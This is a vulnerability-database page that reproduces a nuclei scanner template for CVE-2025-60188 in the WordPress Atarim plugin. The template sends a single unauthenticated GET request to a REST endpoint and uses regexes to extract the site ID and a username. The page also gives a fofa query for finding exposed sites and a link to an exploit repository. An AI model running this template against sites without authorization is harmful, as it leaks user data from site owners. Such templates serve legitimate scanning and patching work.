Lucene search
K

Atarim < 4.2.2 - Sensitive Information Exposure

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 8 Views

Atarim plugin versions before 4.2.2 allow remote exposure of embedded sensitive data.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2025-60188
7 Jan 202619:53
githubexploit
Circl
CVE-2025-60188
7 Jan 202620:48
circl
CNNVD
WordPress plugin Atarim 安全漏洞
6 Nov 202500:00
cnnvd
CNVD
WordPress Plugin Atarim Information Disclosure Vulnerability
11 Nov 202500:00
cnvd
CVE
CVE-2025-60188
6 Nov 202515:54
cve
Cvelist
CVE-2025-60188 WordPress Atarim plugin <= 4.2.1 - Sensitive Data Exposure vulnerability
6 Nov 202515:54
cvelist
EUVD
EUVD-2025-38127
6 Nov 202518:32
euvd
NVD
CVE-2025-60188
6 Nov 202516:16
nvd
Patchstack
WordPress Atarim plugin <= 4.2.1 - Sensitive Data Exposure vulnerability
29 Jul 202509:23
patchstack
Positive Technologies
PT-2025-45261
6 Nov 202500:00
ptsecurity
Rows per page
id: CVE-2025-60188

info:
  name: Atarim < 4.2.2 - Sensitive Information Exposure
  author: m4sh_wacker
  severity: high
  description: |
    Vito Peleg Atarim <= 4.2 contains an insertion of sensitive information into sent data vulnerability caused by improper handling of embedded sensitive data, letting attackers retrieve embedded sensitive data remotely, exploit requires no special privileges.
  impact: |
    Attackers can retrieve embedded sensitive data, potentially leading to information disclosure.
  remediation: |
    Update to the latest version beyond 4.2.
  reference:
    - https://github.com/m4sh-wacker/CVE-2025-60188-Atarim-Plugin-Exploit
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="atarim"
  tags: cve,cve2025,wordpress,wp-plugin,atarim,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/atarim/v1/db/vc"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"wpf_site_id":"'
          - '"notify_user":'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: site_id
        part: body
        group: 1
        regex:
          - '"wpf_site_id":"([0-9]+)"'
        internal: true


      - type: regex
        name: username
        part: body
        group: 1
        regex:
          - '\\?"username\\?":\\?"([^"\\]+)'
        internal: true

      - type: dsl
        dsl:
          - '"username: "+ username'
          - '"Site_ID: "+ site_id'
# digest: 4b0a00483046022100ca73cca007fe42189cf5a0589443b06837b324b6a2d0c2f69e67b791394004a5022100e055d47ae5e409358d669d6c4b08dc8161cc00ff5dc5799d06d5cfc102dec89f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation